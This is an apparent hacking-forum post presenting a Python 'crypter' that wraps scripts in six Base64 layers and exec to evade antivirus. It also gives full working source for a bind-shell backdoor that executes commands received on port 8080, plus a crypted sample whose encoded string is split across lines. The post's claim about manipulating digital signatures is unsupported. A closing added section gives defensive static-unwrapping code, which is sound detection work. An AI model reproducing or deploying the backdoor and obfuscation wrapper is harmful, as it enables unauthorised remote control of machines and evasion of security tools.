Simple Python Base64 Crypter

Post by Th3_M4d_H4tt3r on Thu Jun 20, 2013 4:39 pm

This crypter can only encrypt Python-based backdoors.
My test backdoor code:
Code:
import socket
import os
s=socket.socket( )
s.bind(("0.0.0.0", 8080))
s.listen(1)
while 1:
   try:
      c, addr = s.accept()
      while 1:
         c.send("$ ")
         cmd=c.recv(1024)
         if cmd:
            if "exit" in cmd:
               c.send("Bye bye!\n")
               c.close()
               break
            else:
               c.send(os.popen(cmd).read())
   except:
      s.close()
      exit(1)


Here is my crypter code:

Code:
'''

pycrypt - by Th3_M4d_H4tt3r

'''

import sys
import base64
import random
import string

file = sys.argv[1]
f = open(file, "r")
encoded=5   # extra Base64 passes after the first one (6 in total)

print "Crypting..."

cryptedfile = open("crypted-"+file, "a")
cryptedfile.write("\nimport base64\n")

a = base64.b64encode(f.read())
for i in range(encoded):
   a = base64.b64encode(a)

crypted = "a = '"+a+"'\n"
cryptedfile.write(crypted)

crypted = "b = base64.b64decode(a)\n"
cryptedfile.write(crypted)
for i in range(encoded):
   crypted = "b = base64.b64decode(b)\n"
   cryptedfile.write(crypted)

crypted = "exec(b)\n"
cryptedfile.write(crypted)
print "Successfully crypted "+file
print "Saved to: crypted-"+file

The result after crypting gives us this:
Code:
import base64
a = 'VmpGYVlXRnRWa2hWV0d4VVYwaENWVmxYZEV0VE1WVjNWbFJHVG1KSFVsWlZNbkJEWVZaSmVGTnJUbHBOUjJoRVdWWmFhMUpzVG5GVGJIQk9ZV3hhVkZZeWNFdFRiVlp6Vld4YWExSXpRbk5aVjNSYVRXeGtXR05GZEZWTmF6VjZXVEJhYzFac1pFZFhia1pWVmpOQ2Vsa3hXbk5XVms1eldrVTFVMWRHU2taV1ZscHZVVEZLU0ZOdVNrNVdSVnBaVm01d1IyVnNjRWRYYm1SVFVtMDVOVlF4Vm5kaFIwVjNWMWhvVjFKc1drOVVWV1JTWkRKV1NWSnNTbGROYm1oUFZsWlNRMUpyTVVkVmJGcFdZbFJXY2xSVmFGTldWbXhWVVdwQ2FHSldXbFpXYlRWM1YyeGFkR0ZHUWxWV1ZuQXpWakJWTVZORk9WWk9WbHBPWW14S1RsWXlkRk5UTWtsNVZHdG9WR0V5YUZoV2FrcFRWREZhY2xsNlZsVlNhelZYVmtkMFMxbFZNWE5UYTNCV1RXNUNXRlpWV25abFZUbFlUbFpTVjFaVVZrUldNbkJEWXpGS1IxSnVVbXBTVkVaVFZGVldkMlJzV1hsa1IzUldUV3hhVjFsclZsZFViRWw1Vlc1R1lWWnNTbGhaYWtaclZsWk9jazlYYkZOTlJGWkxWbXhhYWs1V1VrZFdiR2hRVm5wV1ZWWnNWVEZSTVdSeFVXNU9VMUpyV25oV1J6RnZWVEF4ZFdGRVdsZE5ibWhRVlZjeFYxSnJPVmhPVjJ4T1lsWktURlpXVWtOU01rcHpWR3hhVldFd2NHaFVWV1EwVWxaV1dFMVlaRlZXTUhCNVZHeG9UMWR0U2xWU2JFNWFZV3RLZWxrd1dsZFhSbkJHWTBkb1YwMHhTazVXVkVaWFZERkdjMkl6WkdsU1ZrcFRWbXBLVTFNeFZsVlJhMlJwWWtkU1ZsVXhhRzloUlRGV1UyeHNWMUp0YUZoWlZ6RkxWakZrZFZKdFJsTk5ibWd4VjJ4V1ZtVkdTbGRVYkZaU1lUTm9WMVp1Y0hOa1ZsVjRWbXM1VW1KSE9UTlphMVpUVld4WmVWVnJkRlpXUlVwTVdrUkdhMlJIU2taVWJXaHBWbGhDV2xac1dsTlpWa3BJVW14YVUySlVWbFZXYkZVeFVURmtjVkZ1VGxOU2ExcFpWMnRXZDFWck1VWlhibFpXVFZaYWNsbDZTa3RXYlVwR1ZXeFNhVmRIYUhwV1YzQkxUVEpSZUZSc2FHbFNWVFZ4VldwQ2QyUXhWbGhOV0dSb1ZteHNORlZzVWt0VmF6RjBaVVZPV0dGclNucFZhMXBIVjBad1JtTkdTazVTVm5BeFZsUkdWMVF4Um5OaU0yUnBVbFpLVTFacVNsTlRNVlp4VVZob1RsWnRkekpWTW5ocllURmFkVkZyVmxoaGEzQjZWbGN4UzJSSFZrbFViRkpYVmpGS1RWWkhlR0ZrTVZwSFUyNVNWV0pYZUc5V2JHUTBUVEZXVlZOdVRsSmlSemt6V1d0V1UxVnNXWGxWYTNSV1ZrVktTRmx0ZUU5V2JGSnlVMjFHVGxJemFFWldWbHByWVRGT2MxTllaRTVXUlZwWlZtdFdkazFHY0VoTlZUVnNWbXh3V1ZReFZqUldiRm8yWWtoV1ZrMVdXbEJWVjNoMlpESktSbFZzU2xkTmJFcE1WbFpTUTFJeVNuTlViRnBWWVRCd2FGUlZaRFJTVmxaWVRWaE9hR0pWY0ZoV01qQTFWMnhrU0ZWcVNsaGhhMHA2Vld0YVIxZEdjRVpqUmtwT1VsWndNVlpVUmxkVU1VWnpZak5rYVZKV1NsTlpiR2h2WTBaVmQxWlVSbXBOVmtZMVYydG9ZVmxWTVVobFJWWldWbTFTY2xVeWVFWmtNVXAwVGxaU1YxWlVWa1JXTW5CRFl6RktSMUpzYUdGU1dFSlRWRlZXZDJWR1drWlpla1pWVFd0d1NWVXl
OVk5XYkZvMllraENWVlpGUmpSVVZscHlaREZzTmxadGRFNVhSVXBhVmtkMGFrNVdaSEpOV0VaVFltdHdWVlJXVlhkbFJuQlhWMjVrV0ZKcmNEQmFSVlkwVldzeGRWVnFUbFpXUlhCNlZWZDRkbVF5U2taaFJtUm9Za1Z3YUZaR1pEUlpWVEI0WTBWYVZtSnNjRlZVVldRMFVsWldWMXBIZEZSaVJWWXpWVzB3TVZkck1IbGpNMmhhVm5wR1RGVXdWVFZYVjA1SVVteGFUbUpXU1hwV1ZsSkxZekZHYzJJelpHbFNWa3BUVm1wS1UxTXhWbkZTYkhCT1VtMTRXRmxWV2t0aFZURkZVbXhXV2xaRlNqWlZSa1U1VUZFOVBRPT0='
b = base64.b64decode(a)
b = base64.b64decode(b)
b = base64.b64decode(b)
b = base64.b64decode(b)
b = base64.b64decode(b)
b = base64.b64decode(b)
exec(b)

Not super powerful, but will bypass an AV and manipulate the digital signature.
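From the defender's side, the stub layout in the post (one long string literal, a chain of `base64.b64decode` calls, then `exec`) can be unwrapped statically, because Base64 is an encoding and needs no key. The following is an added example, not part of the original post: it parses a script without running it and peels any number of nested Base64 layers. The names `peel_base64`, `triage` and `make_sample` are hypothetical, the sample stub is constructed with a harmless `print` payload, and Python 3.8+ is assumed.

```python
import ast
import base64
import binascii


def peel_base64(data, max_layers=32):
    """Decode nested Base64 strictly; return (layers_removed, innermost_bytes)."""
    layers = 0
    while layers < max_layers:
        try:
            decoded = base64.b64decode(data, validate=True)
        except (binascii.Error, ValueError):
            break  # no longer valid Base64: innermost layer reached
        if not decoded:
            break
        data, layers = decoded, layers + 1
    return layers, data


def triage(source, min_len=16, min_layers=2):
    """Parse (never execute) a script and report multi-layer Base64 literals."""
    nodes = list(ast.walk(ast.parse(source)))  # assumes syntax Python 3 can parse
    calls_exec = any(
        isinstance(n, ast.Call) and isinstance(n.func, ast.Name)
        and n.func.id in ("exec", "eval") for n in nodes)
    findings = []
    for n in nodes:
        if not (isinstance(n, ast.Constant) and isinstance(n.value, (str, bytes))):
            continue
        raw = n.value.encode("utf-8", "replace") if isinstance(n.value, str) else n.value
        if len(raw) < min_len:
            continue
        layers, payload = peel_base64(raw)
        if layers >= min_layers:
            findings.append({"line": n.lineno, "layers": layers, "payload": payload})
    return {"calls_exec": calls_exec, "findings": findings}


def make_sample(layers=6):
    """Constructed sample in the post's stub layout; the payload is a harmless print."""
    blob = b"print('constructed sample payload')\n"
    for _ in range(layers):
        blob = base64.b64encode(blob)
    decode = "b = base64.b64decode(a)\n" + "b = base64.b64decode(b)\n" * (layers - 1)
    return "import base64\na = '%s'\n%sexec(b)\n" % (blob.decode(), decode)


if __name__ == "__main__":
    report = triage(make_sample())
    for f in report["findings"]:
        print("line %d: %d layers, exec/eval=%s" % (f["line"], f["layers"], report["calls_exec"]))
        print(f["payload"].decode(errors="replace"))
```

A multi-layer Base64 literal combined with an `exec`/`eval` call is a strong triage signal on its own, and the recovered payload can then be scanned with the same signatures that match the unencoded script.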